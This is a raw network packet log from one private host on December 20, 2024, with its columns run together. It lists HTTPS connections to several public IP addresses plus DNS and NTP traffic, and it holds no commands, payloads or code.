                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:12.831422091 CET44349996116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:13.741816044 CET44349996116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:13.741883039 CET44349996116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:13.741900921 CET49996443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:13.742074966 CET49996443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:13.742187977 CET49996443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:13.742198944 CET44349996116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:13.743788958 CET50002443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:13.743856907 CET44350002116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:13.743948936 CET50002443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:13.744225025 CET50002443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:13.744256973 CET44350002116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:15.154531002 CET44350002116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:15.154597044 CET50002443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:15.155014992 CET50002443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:15.155040026 CET44350002116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:15.156667948 CET50002443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:15.156683922 CET44350002116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:16.070877075 CET44350002116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:16.070960045 CET44350002116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:16.071063995 CET50002443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:16.071063995 CET50002443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:16.071139097 CET50002443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:16.071171999 CET44350002116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:36.661130905 CET49864443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:36.661159039 CET44349864162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:36.661204100 CET49865443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:36.661277056 CET44349865162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:38.375474930 CET49915443192.168.2.7204.79.197.219
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:38.375478029 CET49916443192.168.2.7204.79.197.219
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:38.375493050 CET44349916204.79.197.219192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:38.375500917 CET44349915204.79.197.219192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.358808994 CET49881443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.358840942 CET49885443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.358854055 CET4434988123.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.358859062 CET4434988523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.358884096 CET49913443192.168.2.723.44.201.30
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.358903885 CET4434991323.44.201.30192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.358908892 CET49914443192.168.2.723.44.201.30
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.358953953 CET4434991423.44.201.30192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.678580046 CET50071443192.168.2.723.44.201.19
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.678620100 CET4435007123.44.201.19192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.678687096 CET50071443192.168.2.723.44.201.19
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.678898096 CET50071443192.168.2.723.44.201.19
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.678910971 CET4435007123.44.201.19192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:43.930938005 CET4435007123.44.201.19192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:43.931201935 CET50071443192.168.2.723.44.201.19
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:43.931211948 CET4435007123.44.201.19192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:43.932653904 CET4435007123.44.201.19192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:43.932718992 CET50071443192.168.2.723.44.201.19
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:43.932951927 CET50071443192.168.2.723.44.201.19
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:43.933032036 CET4435007123.44.201.19192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:43.985421896 CET50071443192.168.2.723.44.201.19
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:43.985430002 CET4435007123.44.201.19192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:44.032313108 CET50071443192.168.2.723.44.201.19
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:33:03.275413990 CET4435007123.44.201.19192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:33:03.275499105 CET4435007123.44.201.19192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:33:03.275546074 CET50071443192.168.2.723.44.201.19

                                                                                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:04.953186989 CET5463153192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:05.090451002 CET53546311.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:07.092207909 CET5102953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:07.230459929 CET53510291.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:11.492860079 CET123123192.168.2.740.81.94.65
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:12.847542048 CET12312340.81.94.65192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:13.048306942 CET123123192.168.2.740.81.94.65
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:13.631819010 CET12312340.81.94.65192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:22.482155085 CET53560311.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:22.548209906 CET6031353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:22.548209906 CET6468453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:22.597389936 CET53519971.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:22.685060978 CET53603131.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:22.685448885 CET53646841.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:25.305341959 CET53598641.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:26.070991039 CET53585551.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:29.327595949 CET53647711.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:37.007153988 CET5685853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:37.008732080 CET5228553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:37.185723066 CET53522851.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:39.387473106 CET5461353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:39.387639046 CET6108653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:40.526773930 CET5436653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:40.526968002 CET5111853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:40.663450003 CET53543661.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:40.665424109 CET53511181.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:41.578581095 CET6530353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:41.578893900 CET5781253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:41.579328060 CET6234353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:41.581454992 CET5623153192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:41.598177910 CET6366453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:41.598669052 CET5166953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:41.716483116 CET53653031.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:41.716944933 CET53578121.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:41.717571020 CET53623431.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:41.719456911 CET53562311.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:41.735302925 CET53636641.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:41.735332966 CET53516691.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.085418940 CET5204453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.086007118 CET5193253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.098591089 CET6149453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.098812103 CET5142453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.222197056 CET53520441.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.222935915 CET53519321.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.225064039 CET5187653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.225173950 CET5924553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.362695932 CET53592451.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.365053892 CET6270453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.365189075 CET4935353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.502271891 CET53493531.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:44.000411987 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:44.314483881 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:44.923707008 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.019148111 CET61421443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.091784000 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.091845036 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.091861010 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.091885090 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.092720985 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.094192028 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.096153975 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.238166094 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.288533926 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.300718069 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.332186937 CET61421443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.675870895 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.675890923 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.675904036 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.675916910 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.675945044 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.676316023 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.676415920 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.688561916 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.688577890 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.688594103 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.688659906 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.689244986 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.932337046 CET61421443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.990478039 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:46.018367052 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:46.103614092 CET44361421162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:46.103663921 CET44361421162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:46.103677034 CET44361421162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:46.103744030 CET44361421162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:46.104376078 CET61421443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:46.105776072 CET61421443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:46.111948967 CET61421443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:46.245904922 CET44361421162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:46.419348001 CET44361421162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:46.420473099 CET44361421162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:46.420481920 CET44361421162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:46.420491934 CET44361421162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:46.420730114 CET61421443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:46.420905113 CET61421443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:46.425443888 CET44361421162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:46.733887911 CET44361421162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:46.767028093 CET61421443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:47.033119917 CET61421443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:47.033318043 CET61421443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:47.347371101 CET44361421162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:47.372045040 CET44361421162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:47.373298883 CET44361421162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:47.373644114 CET61421443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:47.427423954 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:47.427609921 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:47.449008942 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:47.449008942 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:47.743211985 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:47.744008064 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:47.744353056 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:47.744636059 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:47.745522976 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:47.745810032 CET53547443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:47.763950109 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:47.764817953 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:47.765197992 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:47.769162893 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:47.924887896 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:47.924887896 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:47.926042080 CET61421443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:47.926755905 CET61421443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.050335884 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.050889969 CET53547443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.196866989 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.197208881 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.240060091 CET44361421162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.240072966 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.240437984 CET44361421162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.240984917 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.241122961 CET44361421162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.241518974 CET44361421162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.241558075 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.241827965 CET61421443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.241926908 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.512403011 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.513787985 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.524974108 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.525330067 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.653218985 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.653258085 CET53547443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.828929901 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.829490900 CET4435354723.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.829900980 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.829916954 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.829933882 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.829988003 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.830204010 CET4435354723.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.830310106 CET4435354723.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.830353975 CET4435354723.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.830368996 CET4435354723.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.830563068 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.831305981 CET53547443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.833165884 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.833285093 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.833549023 CET53547443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.833620071 CET53547443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.833827019 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.833929062 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.967834949 CET4435354723.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.967969894 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.968432903 CET53547443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:48.968542099 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.148202896 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.148286104 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.148390055 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.148459911 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.148490906 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.148590088 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.148610115 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.148730993 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.149880886 CET4435354723.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.150228024 CET4435354723.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.150243044 CET4435354723.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.150311947 CET4435354723.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.150325060 CET4435354723.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.150444984 CET4435354723.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.150448084 CET53547443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.150561094 CET53547443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.164107084 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.164419889 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.169015884 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.169316053 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.177413940 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.177620888 CET53547443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.192329884 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.192532063 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.209690094 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.209793091 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.209903002 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.210692883 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.219038963 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.219203949 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.227874994 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.236773014 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.237021923 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.244462013 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.253746033 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.254007101 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.261120081 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.269701004 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.269948959 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.278419971 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.291440964 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.291455984 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:49.291476965 CET4435354723.209.72.28192.168.2.7
